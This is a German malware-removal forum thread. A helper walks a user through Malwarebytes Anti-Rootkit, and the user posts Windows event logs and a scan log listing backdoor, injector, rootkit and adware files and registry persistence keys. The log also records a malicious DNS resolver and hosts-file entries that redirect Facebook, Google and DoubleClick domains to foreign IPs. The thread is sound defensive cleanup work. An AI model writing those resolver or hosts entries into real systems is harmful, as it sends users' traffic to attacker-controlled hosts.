Error: (10/17/2016 01:13:46 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (10/17/2016 01:12:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Bokvunnu" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (10/17/2016 01:12:31 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Das System wurde zuvor am ‎15.‎10.‎2016 um 15:07:55 unerwartet heruntergefahren.

Error: (10/17/2016 12:26:07 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (10/15/2016 03:08:18 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-CHK5R9U)
Description: Der Server "{0002DF02-0000-0000-C000-000000000046}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (10/15/2016 02:42:15 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (10/15/2016 01:29:30 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (10/15/2016 09:50:34 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (10/14/2016 07:47:05 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (10/14/2016 07:46:19 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Bokvunnu" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.


CodeIntegrity:
===================================
  Date: 2016-10-17 13:31:15.976
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-17 13:31:15.956
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-17 13:31:15.922
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-17 13:31:13.721
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-17 13:31:13.635
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-17 13:31:13.316
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-17 13:29:43.282
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-17 13:29:43.209
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-17 13:29:43.174
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-17 13:29:42.568
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.


==================== Speicherinformationen ===========================

Prozessor: AMD A4-6300 APU with Radeon(tm) HD Graphics
Prozentuale Nutzung des RAM: 39%
Installierter physikalischer RAM: 7364.74 MB
Verfügbarer physikalischer RAM: 4472.16 MB
Summe virtueller Speicher: 8516.74 MB
Verfügbarer virtueller Speicher: 5222.51 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:916.15 GB) (Free:888.41 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 9CFC33A7)

Partition: GPT.

==================== Ende von Addition.txt ============================

cosinus 17.10.2016 14:10
Malwarebytes Anti-Rootkit (MBAR)

Downloade dir bitte Malwarebytes Anti-Rootkit Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.
  • Starte bitte die mbar.exe.
  • Folge den Anweisungen auf deinem Bildschirm gemäß Anleitung zu Malwarebytes Anti-Rootkit
  • Aktualisiere unbedingt die Datenbank und erlaube dem Tool, dein System zu scannen.
  • Klicke auf den CleanUp Button und erlaube den Neustart.
  • Während dem Neustart wird MBAR die gefundenen Objekte entfernen, also bleib geduldig.
  • Nach dem Neustart starte die mbar.exe erneut.
  • Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.
Das Tool wird im erstellten Ordner eine Logfile ( mbar-log-<Jahr-Monat-Tag>.txt ) erzeugen. Bitte poste diese hier.

Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers



Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
http://www.trojaner-board.de/picture...&pictureid=307

RonnyP 17.10.2016 18:41
Hi, hab das ganze jetzt 5 mal durchlaufen lassen und es wird immer wieder etwas gefunden.
hier erstmal die logs dazu. Mache dann morgen weiter.

Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.10.17.05
  rootkit: v2016.09.26.02

Windows 10 x64 NTFS
Internet Explorer 11.187.14393.0
maikp :: DESKTOP-CHK5R9U [administrator]

17.10.2016 15:49:39
mbar-log-2016-10-17 (15-49-39).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 321737
Time elapsed: 32 minute(s), 53 second(s)

Memory Processes Detected: 6
c:\program files\yhid\uketshlo.exe (Backdoor.Bot) -> 2520 -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
C:\Program Files (x86)\mpck\o_network.exe (Trojan.Injector) -> 6528 -> Delete on reboot. [02470e8c2d6de452e34a23ea1ee724dc]
C:\Program Files\SpaceSoundPro\i_network.exe (Trojan.Injector) -> 6708 -> Delete on reboot. [60e90793dfbb3df9cb628b8259ac8f71]
C:\Program Files (x86)\DPower\wemoshow.exe (Trojan.Injector) -> 6864 -> Delete on reboot. [cf7a0f8b950563d3121b6e9f1aeba957]
C:\Program Files (x86)\sunnyday\o_network.exe (Trojan.Injector) -> 6988 -> Delete on reboot. [4cfd19819406c076d25bc6479f66b44c]
C:\Program Files (x86)\win_en_77\win_en_77.exe (Adware.EoRezo) -> 6844 -> Delete on reboot. [50f9d2c89a00ce684e6bd21231d33ec2]

Memory Modules Detected: 1
c:\program files\yhid\eepay.dll (Adware.PennyBee) -> Delete on reboot. [3b0e6f2b5b3f1d19728dce0b0af77090]

Registry Keys Detected: 37
HKLM\SOFTWARE\CLASSES\TYPELIB\{14EF423E-3EE8-44AE-9337-07AC3F27B744} (Backdoor.Bot) -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
HKLM\SOFTWARE\CLASSES\INTERFACE\{A9582D7B-F24A-441D-9D26-450D58F3CD17} (Backdoor.Bot) -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
HKLM\SOFTWARE\CLASSES\INTERFACE\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65} (Backdoor.Bot) -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{A9582D7B-F24A-441D-9D26-450D58F3CD17} (Backdoor.Bot) -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65} (Backdoor.Bot) -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{A9582D7B-F24A-441D-9D26-450D58F3CD17} (Backdoor.Bot) -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65} (Backdoor.Bot) -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{14EF423E-3EE8-44AE-9337-07AC3F27B744} (Backdoor.Bot) -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{14EF423E-3EE8-44AE-9337-07AC3F27B744} (Backdoor.Bot) -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\UketShlo (Backdoor.Bot) -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
HKLM\SOFTWARE\CLASSES\CLSID\{B1E7C398-824A-4CB9-8D98-DF02E560EA02} (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{B1E7C398-824A-4CB9-8D98-DF02E560EA02} (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\CLASSES\TYPELIB\{9AE7A6AE-162E-44c4-9A2B-A6B4EF19909D} (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\CLASSES\INTERFACE\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3} (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3} (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3} (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{9AE7A6AE-162E-44c4-9A2B-A6B4EF19909D} (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{9AE7A6AE-162E-44c4-9A2B-A6B4EF19909D} (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\CLASSES\Extension.Yhhbe.1 (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\CLASSES\Extension.Yhhbe (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\WOW6432NODE\CLASSES\Extension.Yhhbe (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\CLASSES\WOW6432NODE\Extension.Yhhbe (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{B1E7C398-824A-4CB9-8D98-DF02E560EA02} (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{B1E7C398-824A-4CB9-8D98-DF02E560EA02} (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\WOW6432NODE\CLASSES\Extension.Yhhbe.1 (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\CLASSES\WOW6432NODE\Extension.Yhhbe.1 (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{B1E7C398-824A-4CB9-8D98-DF02E560EA02} (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\CLASSES\CLSID\{B1E7C398-824A-4CB9-8D98-DF02E560EA02}\INPROCSERVER32 (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757} (Adware.Kajajugt) -> Delete on reboot. [3514e6b44d4d0630d8e7fb9ca65c5ea2]
HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757} (Adware.Kajajugt) -> Delete on reboot. [3514e6b44d4d0630d8e7fb9ca65c5ea2]
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SpaceSoundPro (Trojan.Injector) -> Delete on reboot. [4cfd62386139cb6bc865f914ae57fa06]
HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\MINIMAL\bsdpf64.sys (Rootkit.Komodia.PUA) -> Delete on reboot. [e0690397afebf244c8a47587f310936d]
HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\MINIMAL\bsdpr64.sys (Rootkit.Komodia.PUA) -> Delete on reboot. [c386cecc9efcd462e5891ede857ee11f]
HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\NETWORK\bsdpf64.sys (Rootkit.Komodia.PUA) -> Delete on reboot. [cb7ed5c5ebafc175115f9f5d49ba867a]
HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\NETWORK\bsdpr64.sys (Rootkit.Komodia.PUA) -> Delete on reboot. [e5645f3b584253e362105aa29f642dd3]
HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\NETWORK\zdwfp (Rootkit.Komodia.PUA) -> Delete on reboot. [2a1f06946238c373a8cb6b911ee50ef2]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\cherimoya (Rootkit.Cherimoya.A) -> Delete on reboot. [c386fd9d8a1053e3f0da2ac2a55e36ca]

Registry Values Detected: 5
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE|OTUTPRODUCT_8J7Y8 (Trojan.Injector) -> Data: "C:\Program Files (x86)\mpck\o_network.exe" -> Delete on reboot. [02470e8c2d6de452e34a23ea1ee724dc]
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE|IDSCPRODUCT (Trojan.Injector) -> Data: "C:\Program Files\SpaceSoundPro\i_network.exe" -> Delete on reboot. [60e90793dfbb3df9cb628b8259ac8f71]
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE|OMEWPRODUCT_9AXRL (Trojan.Injector) -> Data: "C:\Program Files (x86)\DPower\wemoshow.exe" -> Delete on reboot. [cf7a0f8b950563d3121b6e9f1aeba957]
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE|OTUTPRODUCT_XOHU9 (Trojan.Injector) -> Data: "C:\Program Files (x86)\sunnyday\o_network.exe" -> Delete on reboot. [4cfd19819406c076d25bc6479f66b44c]
HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|win_en_77 (Adware.EoRezo) -> Data: "C:\Program Files (x86)\win_en_77\win_en_77.exe" -> Delete on reboot. [50f9d2c89a00ce684e6bd21231d33ec2]

Registry Data Items Detected: 2
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{3d81cbce-e610-469f-9cca-4c3e693ee4a2}|NameServer (Trojan.DNSChanger) -> Bad: (104.197.191.4) Good: () -> Replace on reboot. [68e16b2f8a1073c36aafa5d561a3b947]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{61fe218e-84a2-11e6-a5e2-806e6f6e6963}|NameServer (Trojan.DNSChanger) -> Bad: (104.197.191.4) Good: () -> Replace on reboot. [9aafe7b3d1c9eb4b3cdde89263a138c8]

Folders Detected: 1
C:\Program Files (x86)\sunnyday (Adware.EoRezo) -> Delete on reboot. [33167a20b6e448eed3115294f211817f]

Files Detected: 58
C:\WINDOWS\SYSTEM32\drivers\850f7be33916569bd078ba09b46b7e7d.sys (PUP.Optional.Wajam) -> Delete on reboot. [234e4095801515cd14c9f91a4bfecc6f]
C:\WINDOWS\SYSTEM32\drivers\bsdpf64.sys (Rootkit.Komodia.PUA) -> Delete on reboot. [d89b9890e5bdbc020126a257de5a7458]
C:\WINDOWS\SYSTEM32\drivers\bsdpr64.sys (Rootkit.Komodia.PUA) -> Delete on reboot. [f617955b62482d563ae3df028e8c8722]
C:\WINDOWS\SYSTEM32\drivers\cherimoya.sys (Rootkit.Agent) -> Delete on reboot. [ae2e953a2179e75e7f1f99ec3f8a3a09]
C:\WINDOWS\SYSTEM32\drivers\NetUtils2016.sys (PUP.Optional.StartGo123) -> Delete on reboot. [9ee21f7d46bd2b0f128e0907babc7d28]
c:\program files\yhid\uketshlo.exe (Backdoor.Bot) -> Delete on reboot. [4cfdd6c4cdcd76c05cb530ff7e839f61]
c:\program files\yhid\eepay.dll (Adware.PennyBee) -> Delete on reboot. [3b0e6f2b5b3f1d19728dce0b0af77090]
C:\Program Files (x86)\mpck\o_network.exe (Trojan.Injector) -> Delete on reboot. [02470e8c2d6de452e34a23ea1ee724dc]
C:\Program Files\SpaceSoundPro\i_network.exe (Trojan.Injector) -> Delete on reboot. [60e90793dfbb3df9cb628b8259ac8f71]
C:\Program Files (x86)\DPower\wemoshow.exe (Trojan.Injector) -> Delete on reboot. [cf7a0f8b950563d3121b6e9f1aeba957]
C:\Program Files (x86)\sunnyday\o_network.exe (Trojan.Injector) -> Delete on reboot. [4cfd19819406c076d25bc6479f66b44c]
C:\Program Files (x86)\win_en_77\win_en_77.exe (Adware.EoRezo) -> Delete on reboot. [50f9d2c89a00ce684e6bd21231d33ec2]
c:\program files\yhid\sioar64.dll (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
c:\program files\yhid\sioar.dll (Trojan.Injector) -> Delete on reboot. [0f3a9ffbfc9e70c650b7a111e1207090]
C:\ProgramData\Quoteex\Voltdex.exe (Trojan.Downloader) -> Delete on reboot. [3e0b9ffb7a208caae8ce617843c17f81]
C:\Program Files\SpaceSoundPro\uninstaller.exe (Trojan.Injector) -> Delete on reboot. [4cfd62386139cb6bc865f914ae57fa06]
c:\program files\yhid\bsdpf64.sys (Rootkit.Komodia.PUA) -> Delete on reboot. [71d8405aaceeea4c2e4bffcd03fe738d]
c:\program files\yhid\bsdpr64.sys (Rootkit.Komodia.PUA) -> Delete on reboot. [4405b4e68a10cd692e4abc1008f93bc5]
c:\program files\yhid\eepay64.dll (Adware.PennyBee) -> Delete on reboot. [08412d6db4e6f343ce313d9ccd34a957]
c:\program files\yhid\lhfom.dll (Adware.PennyBee) -> Delete on reboot. [4405f2a8c1d99c9a1de2e5f45aa77d83]
c:\program files\yhid\lhfom64.dll (Adware.PennyBee) -> Delete on reboot. [b5946e2ceeac00369768f2e79a67af51]
c:\program files\yhid\nejtuule.dll (Adware.PennyBee) -> Delete on reboot. [b693dfbb3664f046ba45fedbed143fc1]
c:\program files\yhid\nejtuule64.dll (Adware.PennyBee) -> Delete on reboot. [df6ad0ca0f8b221425dafbdefd048977]
c:\program files\yhid\sirce.dll (Adware.PennyBee) -> Delete on reboot. [75d4a3f70d8d0f277c83eaef05fc6a96]
c:\program files\yhid\sirce64.dll (Adware.PennyBee) -> Delete on reboot. [41081f7bd4c69a9c42bd14c54cb56d93]
C:\Program Files (x86)\mpck\uninstaller.exe (Trojan.Injector) -> Delete on reboot. [55f48d0d6a3071c56ebf68a58184f808]
C:\Users\maikp\AppData\Local\Temp\EHTBCW9NUJ.exe (Trojan.Injector) -> Delete on reboot. [a7a26b2ffd9d93a3121be62750b5d12f]
C:\Users\maikp\AppData\Local\Temp\LKPGWWWXY8.exe (Trojan.Injector) -> Delete on reboot. [ae9b28726634a59167c6878651b4bc44]
C:\Users\maikp\AppData\Local\Temp\1UW41G3VE\8HNBW7SYT.exe (Trojan.Injector) -> Delete on reboot. [89c02e6c0793201662cbcf3e2adb25db]
C:\Users\maikp\AppData\Local\Temp\274246171\ic-0.6d66029b01026c.exe (Trojan.Crypt) -> Delete on reboot. [0940aded9ffb072f92a9ec21cd381ee2]
C:\Users\maikp\AppData\Local\Temp\BLCLAMMBP\BLCLAMMBP.exe (Trojan.Injector) -> Delete on reboot. [58f152482575e254fb32fb12fc09e31d]
C:\Users\maikp\AppData\Local\Temp\NHATRN4BVO\weapprise.exe (Trojan.Injector) -> Delete on reboot. [33169406a8f2c86eb37abf4e22e37f81]
C:\Users\maikp\AppData\Local\Temp\EIH13P9EV\EIH13P9EV.exe (Trojan.Injector) -> Delete on reboot. [b198b2e8960462d4df4e61acfd083cc4]
C:\Users\maikp\AppData\Local\Temp\UI2H2002TE\advance.exe (Trojan.Injector) -> Delete on reboot. [0f3a6e2c4d4d71c5cf5edb329d68e11f]
C:\Users\maikp\AppData\Local\Temp\is-1Q78S.tmp\SetupG.exe (Trojan.ChinAd) -> Delete on reboot. [85c44753603a1224551c1bcec143ff01]
C:\Users\maikp\AppData\Local\Temp\O2NM31Z3HJ\weapprise.exe (Trojan.Injector) -> Delete on reboot. [e069009a7b1fac8a14ca947db84da45c]
C:\Users\maikp\AppData\Local\Temp\QLC5QGK8P6\advise.exe (Trojan.Injector) -> Delete on reboot. [70d9d5c52179d56179b415f87392f808]
C:\Users\maikp\AppData\Local\Temp\is-INFBV.tmp\setup.exe (Trojan.Injector) -> Delete on reboot. [09406436e8b268ce85a8ba534db835cb]
C:\Users\maikp\AppData\Local\Temp\L97SJIXMV\Setup.exe (Trojan.Agent) -> Delete on reboot. [2f1aa7f3c5d5e55108a7f3d9b25206fa]
C:\Windows\Temp\3CC4.tmp (Adware.ConvertAd) -> Delete on reboot. [9dac207a396183b3733e8fdc25dd44bc]
C:\Windows\Temp\bobca\Enisy.din (Adware.PennyBee.WnskRST) -> Delete on reboot. [9aaf2b6fb6e41323568a862c768b2ad6]
C:\Windows\Temp\bobca\Lurzem.exe (Trojan.Addrop) -> Delete on reboot. [cf7a38623763f64063608a5688792cd4]
C:\Program Files (x86)\sunnyday\unins000.dat (Adware.EoRezo) -> Delete on reboot. [33167a20b6e448eed3115294f211817f]
C:\Program Files (x86)\sunnyday\config.conf (Adware.EoRezo) -> Delete on reboot. [33167a20b6e448eed3115294f211817f]
C:\Program Files (x86)\sunnyday\sunnyday-widget.txt (Adware.EoRezo) -> Delete on reboot. [33167a20b6e448eed3115294f211817f]
C:\Program Files (x86)\sunnyday\unins000.exe (Adware.EoRezo) -> Delete on reboot. [33167a20b6e448eed3115294f211817f]
C:\Program Files (x86)\sunnyday\uninstaller.exe (Adware.EoRezo) -> Delete on reboot. [33167a20b6e448eed3115294f211817f]
C:\Windows\System32\drivers\etc\hosts (Hijack.Host) -> Bad: (107.178.247.130 connect.facebook.net) Good: () -> Replace on reboot. [d8719cfe960458deb9c86e2f23e156aa]
C:\Windows\System32\drivers\etc\hosts (Hijack.Host) -> Bad: (.facebook.net
107.178.255.88 www.go) Good: () -> Replace on reboot. [ba8f3d5d6733bf77a2df405db1538b75]
C:\Windows\System32\drivers\etc\hosts (Hijack.Host) -> Bad: (107.178.248.130 static.doubleclick.net) Good: () -> Replace on reboot. [7bcef6a48f0ba1957b07bde0fa0a8080]
C:\Windows\System32\drivers\etc\hosts (Hijack.Host) -> Bad: (.facebook.net
107.178.255.88 www.goog) Good: () -> Replace on reboot. [c68365351a80bb7bb4ced9c43dc7a957]
